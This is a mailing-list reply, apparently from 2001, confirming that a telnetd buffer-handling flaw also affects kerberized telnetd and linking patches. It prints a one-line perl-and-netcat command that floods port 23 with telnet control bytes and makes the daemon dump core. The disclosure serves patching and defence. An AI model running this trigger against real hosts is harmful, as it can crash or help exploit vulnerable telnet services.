Yes, it does.

I tested as suggested on FreeBSD security list with the following command
to our kerberized telnetd, and it dumped core.

 perl -e '$c=sprintf("%c%c", 255, 246); sleep 10; print $c x1000 . "\r\n"' \
        | nc localhost 23

(The nc command is netcat-1.10 from ftp://avian.org/src/hacks/.)  

The following patches by kerberos versions were applied to our kerberized
telnetd to temporarily plug the hole:

        ftp://ftp.cs.washington.edu/cse/patches/krb5-1.1.1.patch
        ftp://ftp.cs.washington.edu/cse/patches/krb5-1.2.2.patch

The patches were derived from an earlier version of FreeBSD patches
before the FreeBSD Security Advisory FreeBSD-SA-01:49.telnetd
(http://docs.freebsd.org/mail/current/freebsd-announce.html) was
issued, so the patches may not be up to date.

---
Voradesh Yenbut                 Software Engineer, CSE
1 206 685-0912                  BOX 352350,  U of Washington    
[EMAIL PROTECTED]        Seattle, WA 98195

> So, most of my machines don't use the standard vendor telnet, but
> instead use one form or another of a kerberized telnet.  Does anyone
> know if today's announcement applies to kerberized telnetd's?
> 
> http://www.securityfocus.com/bid/3064
> 
> -- 
> John "kzin" Rudd                       http://people.ucsc.edu/~jrudd
> Truth decays into beauty, while beauty soon becomes merely charm. Charm
> ends up as strangeness, and even that doesn't last. (Physics of Quarks)
>    -----===== Kein Mitleid Fu:r MicroSoft (www.kmfms.com) ======-----
> 



Reply via email to